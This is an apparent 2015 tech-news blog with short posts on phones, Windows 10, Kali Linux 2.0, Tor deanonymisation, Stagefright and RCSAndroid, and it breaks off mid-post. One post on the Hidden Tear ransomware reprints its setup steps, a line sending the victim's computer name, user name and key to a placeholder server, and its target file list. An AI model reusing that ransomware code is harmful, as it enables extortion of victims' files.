Sunday, September 20, 2015

AVG Antivirus Plans to Compromise Your Personal Details to Advertisers

There are lot of free software's or applications which are free available to users and many of the companies provide these software's at no cost and they assures you that they will not charge you any cost. But did you ever think, why they providing free software's and application to you ? 
Nothing comes free and AVG antivirus will compromise your personal data to the advertisers. Many companies assure you to not sell users personal details to anyone or not to compromise users to anyone.

AVG based on Czech Republic antivirus company announced its new privacy policy in which company openly admits that it will collect the details of the users and sell to the advertisers for making money from its free antivirus software.

This new policy comes in effect from 15 October, in which everything explains that AVG will be allowed to collect and sell users personal and non-personal details to the advertisers for making money.

List of the details which AVG will collect 
  • Browsing History,
  • Meta-Data,
  • Advertising ID associated with your device,
  • Search History,
  • Internet Service Provider or Mobile Network you use to connect to AVG products,
  • Information regarding other apps you have on your device.
On previous policy only following information was collected
  • Data on the words you search,
  • and information about any malware on the users machine.

However, announcing its new policy, the firm has mentioned that it will not sell any personal data related to its customers, including name, email addresses, residential addresses, or credit card details (but these data might sometimes leak inside the browsing history).

At this point, AVG claims that the company will filter out users' personal details from the browsing history before selling it to the third-parties, but also adds that user's personally identifiable data like addresses, age, or IPs may sometimes be shared with collaborators.

Tuesday, September 15, 2015

Moto X Play Available at Killer Price Rs 18499/-

Moto X Play is your perfect match. With more than a day of battery life and water-repellant design, you can do more —day and night, rain or shine. Its 21 MP camera takes stunning photos, and the full HD screen displays sharp images & videos. And with Motorola Shells, you can express your unique style.



It has 21 MP camera and 5.5” HD screen and Pure Android experience and smart software. It's System Architecture/Processor os Motorola Mobile Computing System including 1.7GHz Qualcomm Snapdragon 615 Octa-core CPU, Adreno 405 @ 550 MHz GPU, Natural Language Processor, Contextual Computing Processor

Display of this device is 5.5” 1080p Full HD, 403 ppi, Corning Gorilla Glass 3. It's front camera is 5 MP. It has Dual nano SIM (DSDS)availability and also Battery which is 3630 mAh Mixed usage up to 48 hours. Moto X Play is water repellent and NFC enabled.

It is available and has price Rs 18499/-.

Saturday, September 12, 2015

Google's Android Pay App is Now Official

Google announced the Android Pay app for the android users and it replaces the google wallet from your phones and you can simple store your Credit or Debit card details on your Android Pay app and you can shop with it in stores also.



In Stores

Forget fumbling through your wallet and handing over a card next time you’re in a store. With Android Pay you can simply unlock your phone, place it near a contactless terminal, and you’re good to go. You don’t even need to open an app. Tap and pay is that fast, that easy.

And when you tap at select merchants, your loyalty points and offers are automatically applied at checkout too.

Google adds extra layers of security so your details remain confidential.

Your card info stays safe

When you shop at a merchant, Android Pay doesn’t send your actual credit or debit card number with your payment. Instead we use a virtual account number to represent your account information — so your card details stay safe.

Keep track of your purchases

As soon as you make a purchase, you’ll see a payment confirmation that shows you exactly where a given transaction happened, along with the merchant’s name and number. So it’s easy to catch any suspicious activity.

Peace of mind when you lose your phone

No more frantically canceling your credit cards. If your phone is ever lost or stolen, you can use Android Device Manager to instantly lock your device from anywhere, secure it with a new password, even wipe it clean of your personal information.

At launch, companies like American Eagle, Macy’s, Pepsi, Subway, Staples, Whole Foods, and Bloomingdales are all outfitted with NFC-ready terminals. Well, they have been for some time, but now you are paying with Android Pay instead of Google Wallet.

Like the old Google Wallet, Android Pay (which will replace your Google Wallet app) works with any NFC-enabled Android device running Android 4.4+. Android Pay supports credit and debit cards from American Express, Discover, MasterCard, and Visa and more will be added soon.
For more details refer to the link given below.

Saturday, September 5, 2015

Updating The Logo and The Website

Rebsec Solutions is updated the website as it has new look and feel. It is our first evolution as we simply updated many of the new things and also soon launching the new security products.



Here, Our new Logo of Rebsec Solutions

We also change our brand logo and colors too. Last time we have green color in our theme color and now we updated it to the Blue. 

Fire in our logo, and we are back with many new things which comes up later. We gave new look and new feel to our website as you can check it here at Rebsec.

Our company's tag line is still "Your Innovations Our Securities" because we did not change our work style and also working on the securities and also added up new things. 

Our Services are :
  • Corporate Espionage,
  • Litigation Support,
  • Individual Investigation,
  • Cyber Investigation,
  • Online Reputation Management,
  • Forensics, and 
  • Audit Services
Have a look at our new looked website. Rebsec Solutions

Thursday, September 3, 2015

New LG Nexus and Huawei Nexus Devices to be Unveiled on September 29

Google will hold special nexus based event on September 29 in San Francisco, according to new report citing "people familiar with the company's plans".


The giant search engines Google will introduces the new devices as New LG Nexus and Huawei Nexus. The news is leaked many times before this leak also.

In 2013, LG launched Nexus 5 smartphone and now this time this new LG Nexus is the successor to the same Nexus 5. As in the picture, the upcoming Nexus if from the Huawei.

This will be the first Nexus phone for Huawei, with which company gain the brand recognition. The Nexus device will have the latest Android Operating System MarshMallow Android 6.0.

Pricing to be revealed soon by the company. Google has not confirmed this information which means this information might be change as per the company's plans.

Wednesday, August 26, 2015

GitHub Again Attackd By DDoS Attack

GitHub is a popular source code sharing website which is used by programmers for software development and user collaborate in the development. On Tuesday morning GitHub again became the victim of DDoS (Distributed Denial of Service) attack.



After investigation of the attack occur on the website, the team identified that the service of the website was under the new DDoS attack and early on Tuesday company knows the attack.


GitHub posted about this information on there official Twitter account. "The connectivity problems have been identified as a DDoS attack. We're working to mitigate now," on GitHub status.

This time attack did not take last long, roughly just four hours after issue is reported by company. Github announced that everything was back to normal after mitigated the attack.

Last time on march DDoS attack against GitHub lasted about a week. The attackers used the malicious javascript to hijack the internet traffic from victims worldwide that was redirected to GitHub.

Unless from GitHub status page on twitter, the company has not provided much more details about this latest attack.

Sunday, August 23, 2015

Google Just Launches The New OnHub Router New Way To Wi-Fi

Google has launches the new way to wi-fi router called OnHub. It streaming and sharing in new ways our old routers were never built to handle. Meet OnHub, a new router from Google that’s built for all the ways you Wi-Fi.


OnHub gives you many of the features as
  • Speedy streaming for everyone
  • Bandwidth when you need it
  • Wi-Fi with reach
  • Simple setup
  • Helpful feedback
OnHub makes the most of your existing Internet service by using smart software to find the best Wi-Fi connection. Prioritize a device so it has the fastest Wi-Fi for the activities that matter most. OnHub’s innovative circular antenna design provides reliable Wi-Fi coverage in more directions in your home.

Google also provided you the Google On app for managing your OnHub router from your smartphone. It has features like :
  • Run a network check
Easily test the speed of your connection for hiccups, and the app gives you simple ways to get back to peak performance.
  • Keep an eye on your network
See each device that’s connected to your Wi-Fi and which are taking up the most bandwidth.
  • Control from anywhere
Use the Google On app to troubleshoot at home or away, see who’s on your network, or enable a friend to help you remotely.

OnHub is designed to support a growing number of "smart devices" over time because it includes Bluetooth® Smart Ready, 802.15.4 and Weave and 802.15.4, so that over time it will support a growing number of “smart devices.”

It gives you Wi-Fi at a speed of up to 1900 Mbps by supporting both 2.4GHz and 5GHz frequencies, which means fast Wi-Fi for everyone and also gave you fast Wi-Fi, OnHub’s 13 antennas (six 2.4GHz antennas, six 5GHz antennas, and a congestion-sensing antenna) are arranged in a unique circular pattern. It has 4 GB of storage space for auto updates and latest software features.

OnHub router is available for Pre-order and it costs of $199.99. You can pre-order your OnHub router from this Link

Wednesday, August 19, 2015

Google Hangouts Got Dedicated Website

Yes, it is official now. Google launches a dedicated website for google Hangouts. If you use google hangouts for chat or for talking to your friends, you don't need to open google+ or gmail to access google hangouts. 



Just open the dedicated website of Google hangouts https://hangouts.google.com/ for hangouts messaging service.

As you can see in the screen-shot above, the web client contains a contact list on the left, and large buttons to make a video or a phone call as well as to send a message towards the center. The background wallpaper is randomly selected, and changes each time you visit the web page.
source

The Ransomeware Kit Allow Script Kiddies Creating Their Own Ransomware

Utku Sen, a turkish security researcher has posted fully functional ransomware code on code sharing website Github. The ransomware named as Hidden Tear uses the AES encryption for locking the files before displaying the ransom message to get user to pay up.




Utku Sen describes his Ransomware as "a ransomware-like file crypter sample which can be modified for specific purposes." This means even script kiddies can now develop their own Ransomware to threaten people.

The Hidden Tear — Free Ransomware Kit

The "Hidden Tear" Ransomware package consists of four files namely:
  1. Hidden-Tear-Decrypter
  2. Hidden-Tear
  3. .gitignore
  4. README.md
Hidden Tear Ransomware is capable of:
  • Small file size (12 KB)
  • Using AES algorithm to encrypt files
  • Evading detection by all standard anti-virus programs
  • Sending encryption key to a server
  • Creating a text file in Desktop with given message
  • Encrypting files and decrypting them using a decrypter program with the encryption key
How to Setup your Custom Ransomware Using Hidden Tear?

Sen has specified usage details as well, he says:

1. You need to have a web server that supports scripting languages such as PHP or Python. Then change the below-mentioned line with your URL. (Better use HTTPS connection in order to avoid eavesdropping):


string targetURL = "https://www.example.com/hidden-tear/write.php?info=";

2. The script should write the GET parameter to a text file. Sending process running in SendPassword() function:


string info = computerName + "-" + userName + " " + password;
var fullUrl = targetURL + info;
var conent = new System.Net.WebClient().DownloadString(fullUrl);


3. Target file extensions can also be change. Default list:


var validExtensions = new[]{".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"};

According to Sen,

"While this may be helpful for some, there are significant risks. The 'Hidden Tear' may be used only for 'Educational Purposes.' Do not use it as a Ransomware! You could go to jail on obstruction of justice charges just for running hidden tear, even though you are innocent."

Follow some important steps that should be considered to protect yourself from Ransomware threats.
  • Always keep regular backups of your important data.
  • Make sure you run an active anti-virus security suite of tools on your system.
  • Do not open email attachments from unknown sources.
  • Most importantly, always browse the Internet safely. source

Sunday, August 16, 2015

Personal Cloud Storage

You all heared about the Cloud Storage to store your data or files into the online clouds. In this case you have to register an account to a particular cloud storage website and get some sort of free space to store the data.

But in Personal Cloud storage you don't need to register on another website for cloud storage space, instead you shall have your own storage located at you own house that you can access anywhere, anytime. And also your data is secured at your home and nobody from the outside can access your data.

Other Cloud websites offer you a limited free space but In Personal Cloud Storage you can have your own massive storage

Many of the companies had been launched the Personal Cloud Storage Devices that you can buy at very affordable prices.

Thursday, August 13, 2015

Next Generation Penetration Testing Platform - Kali 2.0 Released

Offensive Security, the creators of Swiss army knife for Security researchers, Penetration testers and Hackers have finally released the much awaited and most powerful version of Kali Linux 2.0. Kali Linux 2.0 (Codename ‘Kali Sana’), an open-source penetration testing platform brings hundreds of Penetration Testing, Forensics, Hacking and Reverse Engineering tools together into a Debian-based Linux distribution.



Features of Kali Linux 2.0 :
  • Runs on Linux kernel 4.0, 
  • use full Gnome 3 Desktop instead of gnome-fallback, 
  • Kali 2.0 added inbuilt screencasting tool so that you can record desktop.
  • Kali Linux now added desktop notifications, so that you do not miss anything, 
  • improved hardware and wireless driver coverage, 
  • Featuring new cutting-edge wireless penetration tools, 
  • support for a variety of Desktop Environments, 
  • updated desktop environment and tools, 
  • Support Ruby 2.0, which will make Metasploit will load much faster, 

Kali 2.0 now natively supports KDE, GNOME3, Xfce, MATE, e17, lxde and i3wm. Kali has removed metaslpoit community and pro packages but instead open source metasploit framework packages are pre-installed available.

Upgrade to Kali 2.0
Kali Linux users can upgrade their Kali 1.x to Kali 2.0 without reinstalling whole operating system from scratch. To do this, you will need to edit your source.list entries, and run a dist-upgrade as shown below.


cat << EOF > /etc/apt/sources.list
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security/ sana/updates main contrib non-free
EOF
apt-get update
apt-get dist-upgrade # get a coffee, or 10.

rebootOfficial Kali Linux Downloads here
Kali Linux Downloads VMware, VirtualBox and ARM Images here

Monday, August 10, 2015

Why Linux is Important for Hackers

Linux Is Open Source

Linux is open source and free available as compared to windows operating system which is available paid. It means that the source code of the operating system is open source and is available for us. As such, we can change and manipulate it as we please. If you are trying to make a system operate in ways it was not intended, being able to manipulate the source code is essential.

Just think of it, linux provides you the full source of the kernel and could microsoft provides you the kernel source of windows for users to modify and use windows for hacking.



Linux Is Transparent

To hack effectively, you must know and understand your operating system and to a large extent, the operating system you are attacking. An operating system can also call to another operating system. Linux is totally transparent, meaning we can see and manipulate all its working parts.

Not so with Windows. User does not know the internal working of the windows operating system because Microsoft tries hard to make it as difficult or impossible to know the inner workings of their operating systems. As a result, when working with Windows you are working with “shadows” of what you think is going on under the hood, user cannot modify or alter the system files of the windows operating system, whereas in Linux you have a “spotlight” shining directly at each and every component of the operating system. This makes working with Linux more efficient and effective.

Linux Offers Granular Control

Linux is granular. That means that we have almost infinite amount of control over the system. In Windows, you only can control what Microsoft allows you to control. In Linux, everything can be controlled by the terminal in the most miniscule to the most macro level. In addition, Linux makes scripting in any of the scripting languages simple and effective.

Most Hacking Tools Are Written for Linux

Well over 90% of all hacking tools are written for Linux. Of course, there are exceptions like Cain and Abel and Havij, but those exceptions simply emphasize the rule. Even when hacking tools such as Metasploit or nmap are ported for Windows, not all the capabilities transfer from Linux. There are only few tools available for windows with less features that why user have to use linux for using these tools.

The Future Belongs to Linux/UNIX

From the beginning of the Internet, Linux/UNIX has been the operating system of choice for web servers for its stability, reliability and robustness. Even today, Linux/UNIX dominates the world of web servers with well over two-thirds of the market. Embedded systems in routers, switches and other devices are almost always using a Linux kernel and the world of virtualization is dominated by Linux with both VMWare and Citrix built on the Linux kernel.

If you believe that the future of computing lies in mobile devices such as tablets and phones (it would hard to argue otherwise), then over 80% of mobile devices are running UNIX or Linux (iOS is UNIX and Android is Linux). Microsoft Windows on mobile devices have just 7% of this market. Is that the wagon you want to be hitched to?

Hacking isn’t for the uninitiated. Hacking is an elite profession among the IT field. As such, it requires extensive and detailed understanding of IT concepts and technologies. At the most fundamental level, Linux is a requirement. 

Sunday, August 9, 2015

Researchers Shares Details of Cyber-Terrorists Targetting Indian Government Officials

Cyber-Terrorism has provoked considerable alarm posed for potential threat which ranges from very narrow to very broad. Terrorists aims at gaining access to Nation's critical infrastructure involving both Government as well as Private sectors involved in cyber espionage and operations.


Nowadays, intensity of cyber attacks are rapidly increasing and extending into absolute cyber-war between states, which allowing terrorists organizations to pilfer data from financial and military organizations. Few months back, a similar incidents happened when a group of middle-east terrorists tried to infiltrate Indian Government official operational in cyber related divisions.

Which in response Independent Indian security researchers team planned a counter operation to track down the terrorist organization behind the cyber attack.

Shesh Sarangdhar, a security researcher at Seclabs & Systems Pvt. told The Hacker News that his team successfully penetrated the source computer (using zero-day exploits) used for spreading malware to Government officials and found that the attacker’s IP address belongs to Pakistan Telecommunication company limited.

“Upon Analysis, the infected system appeared be a part of an elaborately designed cyber operation center,” Mr. Sarangdhar explained.

Researchers found a directory called “Umer Media” on that compromised system, which contained Excel files maintaining a list of “multiple social media profiles of terrorism bent.”

“Excel file elaborately maintained the details of individuals who comment and like on these pages. Many of these social media profiles were later analyzed and revealed some key players behind the cyber-terror organization,” he told The Hacker News team.

The goal of cyber counter operation conducted by the Indian researchers was to prevent cyber attacks against any and all critical infrastructures.

Moreover, the researchers obtained mobile numbers of those key players and compromised their devices using a zero-day vulnerability in Maxthon browser.

“The mobile communication revealed that around 1000 mujahids were being trained to infiltrate Indian borders,” Mr. Sarangdhar told us.
Shesh Sarangdhar and his team will present the complete technical details of their operation, zero-day vulnerabilities used and the malware analysis at upcoming “1337Con” CyberSecurity Conference.

Friday, August 7, 2015

History of Windows From Windows 1.0 to Windows 10 in Single GIF

Microsoft had released its latest windows 10 and many of the user already had it and installed on their system and using it. Here, in a single GIF image file it showing the whole story from the 1985 to 2015 as Windows 1.0 released in 1985 and now Windows 10 released in 2015.

This image is created the onthehub as they show the whole story in a single GIF.


What windows looks like in 1985 and what it looks like now. It has many changes untill now and many new and great features are added.

You can have full experience on onthehub

Thursday, August 6, 2015

The common wisdom when it comes to PCs and Apple computers is that the latter are much more secure. Particularly when it comes to firmware, people have assumed that Apple systems are locked down in ways that PCs aren’t.


Usually Apple's Mac computer are most secure till new vulnerability introduced to hack the apple's mac computer's. The security reseacher has proved that Mac system can also be hacked.

Two security researchers have developed a proof-of-concept computer worm for the first time that can spread automatically between MacBooks, without any need for them to be networked. Thunderstrike 2, the new proof-of-concept firmware attack is inspired by previously developed proof-of-concept firmware called Thunderstrike.

Trammell Hudson a security engineer and Xeno Kovah of firmware security consultancy Legbacore developed Thunderstrike Attack, which actullay took advantage of a vulnerability in Thunderbolt option ROM that could be used to infect Extensible Firmware Interface (EFI) by allocating a malicious code int o the boot ROM of an Apple computer through infected Thunderbolt devices.

Thunderstrike 2 can be spread remotely, an attacker requires to have physical access to your Mac computer to put thunderstrike into your system. Thunderstrike reached to you via phishing emails, malicious web sites as well as through a peripheral connected to the Ethernet port or USB.

The researchers demonstrated the video given below:


"Thunderstrike 2 is really hard to detect, it’s really hard to get rid of, and it’s really hard to protect against something that’s running inside the firmware," Kovah toldWired.

"For most users that’s really a throw-your-machine-away kind of situation. Most people and organizations don’t have the wherewithal to physically open up their machine and electrically reprogram the chip."

Oppo Rolling Out New Update of Color OS 2.1.3i Update

Oppo is rolling out new update of color OS 2.1.3i update for devices Find 7 and Find 7a. Oppo updated the video which showing the new feature of the Color OS.

New Update includes the features of Air Gestures, Eye Protection Mode and efficient power saving mode for their devices. Air gestures allow users to easily navigate on the phone and viewing photos or switching between applications and homescreens.


Power saving mode promises ample energy saving setting and changes that have been made can be saved. So, you can switch the settings on the devices as you want to. When you switch, it automatically loads the predefined settings.

Eye protection mode is for those users or people who continuously uses phone at regular basis and for those who send or read the text on their phone. When this eyed protection is enabled, the screen simply switched to a wam color temperature and back to cold when disables. This is happens as the display's blue lights are set to low, medium or high at levels.

The update also includes the other stabilities or improvement of the performance of the devices and this update will rolling out soon.


Wednesday, August 5, 2015

One-Fifth of The Active Android Device Now Runs the Android Lollipop

As per the latest analysis of this month on android running devices 18.1% of the devices now runs the Android Lollipop. Android Lollipop is the latest version of the Android operating system. And Kitkat has 39.3% running on the android devices. This report is as per the analysis of this month.



Marginally up from the 39.2% figure that was reported in month of June. Jelly Bean's share, on the other hand, has fallen significantly, with 33.6% Android devices currently running it, down from 37.4% reported the last time.

Other Android versions, including Ice Cream Sandwich, Gingerbread, and Froyo are currently powering 4.1%, 4.6%, and 0.3% of all active Android devices, respectively.

Tuesday, August 4, 2015

Motorola Moto G 3rd Generation - Brief

Few phones have managed to leave such a lasting impression in the mobile world in recent years, as the original Moto G. The budget smartphone redefined what can be achieved in a budget-friendly Android phone and sparked a whole new wave of devices, offering advanced functionality in and affordable package.


Features

Water Resistant

You need your phone to be there for you, even in less-than-ideal conditions. IPX7- rated water protection keeps your phone safe from splashes and drop in water. After an accidental splash into a puddle or sink, just dry off you phone and keep going.

Corning Gorilla Glass Display

Motorola Moto G 3rd Generation has Corning Gorilla Glass 3 protection glass spans from nearly edge to edge to help keep your phone protected from unsightly scrapes and scratches.

Long Lasting Battery

This New Moto G comes with 2470 mAh battery with which you can spend whole day without charging your phone and gives you a better battery backup which is designed to last a full day.

Customisation

You can customise you Moto G's Back cover panel and you will get variety of shell with variety of colors so you can customise the color as per you mood.

Pure Android Experience

Motorola Moto G 3rd Generation runs latest Android Lollipop which is free from any bloatware (free from any unnecessary software which slows down the phone). 

Moto Assist

Moto Assist understands where you are and what you are doing and adapts in ways that help you. Like letting only highest-priority calls through while you are asleep, or keeping your phone silent during meetings.

Performance

Motorola Moto G 3rd Generation powered by Qualcomm Snapdragon 410 processor has 1.4 Ghz quadcore CPU and has advances Adreno graphics which provides you to runs multiple apps to run at one time.

It has 5'' inches HD display which provied you vivid colors experience, deep blacks and crisp whites even in outdoors.

Moto G 3rd Gen gives you fast speed of 4G LTE with which you can browse web, stream videos and music, play games and etc.

Moto G 3rd Gen has 13 MP rear camera ans 5 MP front camera. Even in Low light, the ultra-fast f2.0 lens produces crystal clear images and color balancing with dual LED flash preserves color and clarity.

You have two options if you want to buy Moto G 3rd Generation
1. 8GB version has 1 GB of RAM and has cost Rs.11999/- 
2. 16GB version has 2 GB of RAM which costs you Rs.12999/-

and it is available online to purchase.
source

Monday, August 3, 2015

New Flagship Killer OnePlus Two - Brief and Features

OnePlus Two is another Android Powered Smartphone from OnePlus. They made many changes to their new smartphone with the latest new specification and hardware changes in it.

Specification of OnePlus Two 

OnePlus Two Android Smartphone powered by Qualcomm Snapdragon 810  octa-core processor and has 4G LTE and comes with 3300 mAh battery. It has a big power backup for your apps, games and HD video for a long day battery. 

A lot of time is spent looking at our smartphone’s screen, so it should be amazing. The OnePlus 2’s 5.5” IPS LCD display produces incredibly sharp lines and true-to-life colors. Experience crystal clear images, video, and text in any setting.

Never be tied down. The OnePlus 2 comes carrier-unlocked with wide range band support for service providers worldwide. And, with dual SIM capabilities, you can connect to two networks simultaneously to travel with ease. Manage your work life and personal life without the need to carry around two phones. It’s one device, for everything.

It is also comes in multiple back panel for your personal style and you can change style swap covers which comes in premium materials and you can choose it from different variety.


Camera sensor’s large pixels collect more light for less noise and exceptional performance in dark conditions. Advanced laser autofocus and optical image stabilization systems ensure that you never miss that perfect shot, while 6 lens elements prevent distortion and improve clarity. It has 13 MP pixel rear camera and 5MP front camera.

Despite being a go-to measure for smartphone cameras, megapixels fail to tell the whole story. The true test of a camera is the quality of its image sensor and optics. Our sensor contains large 1.3µm light-collecting pixels—the biggest ever in a 13MP smartphone camera—for unmatched low-light performance. A six-element lens prevents distortion, making sure that photos are clear and crisp. Day or night, make every shot beautiful.

This time onePlus comes with OxygenOS in place of Cynnogenmod and it is light and powerful software built on android and has many optimizations and thoughtful features.

A lightweight, resilient aluminum and magnesium alloy frame and stainless steel accents unify the OnePlus 2’s sleek metal design. Durability and sophistication with an unrivaled premium feel.
It has Type - C USB port for both data transfer and changing. It is latest type data cable which is reversible or fumble free. You do need to worry about how or which side you insert in the port. You can insert data cable either from both sides.

It comes with dual sim support. It comes in two variant as 16 GB version comes with 3GB of RAM and 64 GB version comes with 4GB of RAM and it does not has memory card expansion slot. It has 5.5 inches LTPS LCD capacitive touchscreen with 401 ppi pixel density.


It also has fingerprint scanner on its home button. 




Sunday, August 2, 2015

Google's Translate App - Brief

Google Translate app let you translate the text or images into the different languages and it instantly translate visually printed text in seven languages by just opening the app and click on the camera and point it on the printed text and it instantly translate the text - a street sign, ingredient list, instruction manual and etc and this app not require the internet connection or your cell phone data.

Now Google updated the Google Translate app again with adding more language for visually printed translations to 20 more language and now it total becomes 27 language.


Description of Google Translate App

Speak, scan, type or draw to translate in 90 languages.
——
* Type to translate 90 languages
* Use your camera to translate text instantly in 26 languages
* Two-way automatic speech translation in 40 languages
* Draw with your finger as a keyboard alternative
* Download language packs for when you're traveling, or if your connection is expensive or slow.
* Star and save translations for future reference
* Take pictures of text for higher-quality translations or for languages not supported by instant camera translation

New Features added to Google Translate App

Smoother conversation in 40 languages. Improved accessibility support.
Instantly translate printed text in 20 new languages with your camera:
TO/FROM English:
Bulgarian, Catalan, Croatian, Czech, Danish, Dutch, Filipino, Finnish, Hungarian, Indonesian, Lithuanian, Norwegian, Polish, Romanian, Slovak, Swedish, Turkish, Ukrainian
FROM English to:
Hindi, Thai

The Update rolled out for both Android and iOS platforms.

Translate Community working great to make this Google Translate App better. 

Without Cracking Any Encryption Spies Can Unmask Tor Users

Tor (The Onion Tor) Network is using for the anonymous surfing over the internet. Now, the Tor Browser is in danger because the "Spies" who's only intention is to gather information by intruding the other's network.


A team of security researchers from Massachusetts Institute of Technology (MIT) have developed digital attacks that can be used to unmask Tor hidden services in the Deep Web with a high degree of accuracy.

The journalists, hackers ans internet users all are using the TOR network to surf on the internet anonymously. Tor provide anonymity to its user and tracking of the activity done by the user is almost very difficult.

User's who are connected to TOR network gets the encrypted network from where their ISP cannot find the logs or activity of that user and IP of the TOR user are also changed once they are connected to the TOR Network.

Without Decrypting the TOR Network or Traffic the Identities can be Revealed.

The Net Securoty team from MIT and Qatar computing research institute claimed that their is a new vulnerability in the TOR's Guard Gateway that can be exploited to detect whether a user is accessing one of the TOR's hidden services.

They explained, Tor's Guard Gateways could be masqueraded and the packets coming from the user could be made to travel through attacker’s malicious ‘setup’ node acting as an Entry node. In a proof-of-concept attack published this week, the researchers described this technique as "Circuit Fingerprinting,"

It is kind of the behavior biometric which include series of passive attacks that allows spies to unmask the TOR users with almost 80-90 percent accuracy even when without decrypting the tor traffic.

This new alternative approach not only tracks the digital footprints of Tor users but also reveals exactly which hidden service the user was accessing; just by analyzing the traffic data and the pattern of the data packets.

"Tor exhibits fingerprintable traffic patterns that allow an [enemy] to efficiently and accurately identify and correlate circuits involved in the communication with hidden services," says the team.

"Therefore, instead of monitoring every circuit, which may be costly, the first step in the attacker's strategy is to identify suspicious circuits with high confidence to reduce the problem space to just hidden services."

The technique nowhere breaks down the layered encrypted route of Tor network, so being encrypted doesn't make your identity anonymous from others.

The Tor project leader Roger Dingledine raises a question to the researchers asking about genuineness of the accuracy that the Traffic fingerprinting technique delivers, which leaving the researchers and the users confused.

As for the Tor, it is considered to be a popular browser that protects your Anonymity while accessing the Internet. However, with the time and successful breaches, it seems that this phenomenon of the Tor network could get depleted.

According to the MIT News article, the fix was suggested to Tor project representatives, who may add it to a future version of Tor.
source

Friday, July 31, 2015

Microsoft Windows 10 Overview



After many of the windows operating systems version like XP, Vista, 7 and 8 or 8.1 Microsoft released it latest Windows operating system Windows 10 and it has very new exciting features that you will like. Many of the registered users already gets their update of windows 10. If you did not get your's than hurry visit microsoft official website for information on how to upgrade your current windows operating system to microsoft windows 10.

Here we discuss the new and enhanced features of the Microsoft windows 10. One of the features than many of the users want is that the start menu. which is not available in the Windows 8 or Windows 8.1 and finally it is back know.

Windows 10 has Start Menu just like windows xp and 7 do and it is much better now. Same windows icon on the left side on the status bar.


As you see in the image above, the start menu is much better now you will see the list of application and also the tiles menu as smart screen in windows 8 or 8.1 has.

On the right part of the Start Menu, there is a grid of app tiles that you can arrange however you like. The "live" tiles will show you updates, such as the latest stock prices, the last show you were watching on Netflix, social media updates, weather, news and sports scores.


If you want, you can take the Start Menu full-screen by clicking the "expand" button -- it's kind of like having a tablet or smartphone screen for a desktop. But, crucially, it's only there if you want it. The default is the familiar Windows desktop experience.

Windows 10 provides some design changes that Windows 7 users will welcome. For example, taskbar icons glow at the bottom when they are opened, but only the app icon that is currently being used is completely highlighted. In Windows 7, all open apps are highlighted, confusingly.


The single best new productivity feature is Task View, which presents a visual summary of all your open apps and finally allows you to create virtual desktops without requiring third-party software. You can access easily access it in three ways: A three finger swipe up on the trackpad, by pressing Win + Tab, or by dragging in from the left side of the display. There’s also an icon on your Taskbar, should you forget the shortcuts and gestures.


Microsoft’s made its own window snapping feature more powerful. Now when you pin a program to either side of the screen, Windows will line up suggestions to fill up the remaining space. You can even snap four windows at a time now by dragging a window into each corner of the display.


It would’ve been easy for Microsoft to just completely drop the tablet interface on Windows 10 PCs, but instead it took a more versatile approach: only force the tablet UI when you need it (or want it).


The most new feature in Microsoft Windows 10, Microsoft added their own own assistant app in it named as Cortana. Cortana reponses according to your queries.
via via

Thursday, July 30, 2015

New Web Browser From Microsoft - Microsoft Edge

Microsoft has launched its new web browser in windows 10 in the place of the Internet Explorer. It is the latest web browser from the Microsoft which comes in the Windows 10. It gives you the new way to read and write on the web and also to find stuff over the internet.

Features of the Microsoft Edge Web Browser

HUB : all your stuff in one place

Hub contains all your history, favorites, browsing history and all your current downloads. You can view all your browser details by clicking of the hub icon (three parallel lines). It keeps the records of all your browsing history and things you collected and that you do on the internet.

Search faster from the address bar

The results you finding over the internet for any particular query are much faster as compared to older web browser. You do not need to go to any particular website to search for any images and instant search is available in the Microsoft Edge web browser.


Like in the above image as you see that instant search is also available from the address bar. Just write over the address bar you want to search for and instant search is available from the address bar.

Write on the Web

You can write, draw and take notes directly on the web pages. Microsoft Edge provides you the web notes as it is only browser which provides you to write , take notes and doodle and also highlights things over the web pages.

Microsoft Edge also provides you th reading view any article available over the internet. Icon in the address bar on the right side reading layout icon provides you the reading view of the webpage by clicking on it.







source

Tuesday, July 28, 2015

Vulnerability Lets Hacker's Enter Into Android Phone Using a Message

A new vulnerability may found in android phone in which hacker can enter into any android phone using just a simple message send to any user's android phone - It is just like same as we all saw in movies hacking trick. But, yes this new vulnerability found in the android phones as researcher reports and this is biggest vulnerability in the android device.


- Researchers at Zimperium Mobile Labs, where it was discovered by VP of Platform Research and Exploitation Joshua Drake, claim that up to “95% of Android devices” are vulnerable.
- To initiate the attack, the hacker sends a maliciously modified video message. The message is able to circumvent Android’s sandboxing security measures and execute remote code — at which point they’d have near-full access to your device, its storage, its camera and microphone, etc.

- The hack is being referred to as “Stagefright.” “Stagefright” is also the media library that Android uses to process video, and is the bit of code being exploited here.

- In many cases, the device will start processing the message without the user opening the message manually. Just receiving the message is enough to get the ball rolling.

- Worse yet, an attacker could theoretically delete the message themselves as soon as they’ve executed the attack, leaving behind no trace but a notification that most would quickly swipe away with no idea that their device is now under an attacker’s control.

- The bug is said to have been introduced in Android v2.2 (Froyo), but Zimperium has successfully tested it on builds as recent as the latest release, Android 5.1.1 (Lollipop). Devices running a build older than Jelly Bean (4.1) are said to be most vulnerable.

As reported by the Google's Spokesperson,

“We thank Joshua Drake for his contributions. The security of Android users is extremely important to us and so we responded quickly and patches have already been provided to partners that can be applied to any device.

Most Android devices, including all newer devices, have multiple technologies that are designed to make exploitation more difficult. Android devices also include an application sandbox designed to protect user data and other applications on the device.”

But the GOOD NEWS is that google has already fixed this vulnerability as this is patched by the OTA update.

And the other news is that it also depends on the manufacturers of the mobile phones that they will include the patch in the software update or not.

Monday, July 27, 2015

RCS Android Hacking Tool

As digging deeper and deeper into the huge Hacking Team data dump, security researchers are finding more and more source code, including an advanced Android Hacking Tool. Yes, this time researchers have found a source code to a new piece of weaponized android malware that had the capability to infect millions of Android devices even when users are running latest versions of the android mobile operating system.


Trend Micro researchers found that the Italian spyware company was selling RCSAndroid (Remote Control System Android), which they says, is one of the "most professionally developed and sophisticated" pieces of Android malware a.k.a Android hacking tool they have ever seen. RCSAndroid is a sophisticated, real-world surveillance and hacking tool that provides even unskilled hackers to deploy one of the world's more advanced surveillance suites for Google's mobile operating system Android.

List of Creepy Features of Android Hacking Tool

Once installed on targets' devices, RCSAndroid would have helped government and law enforcement agencies around the world to completely compromise and monitor Android devices remotely. Here are some of the features of RCSAndroid include the ability to:

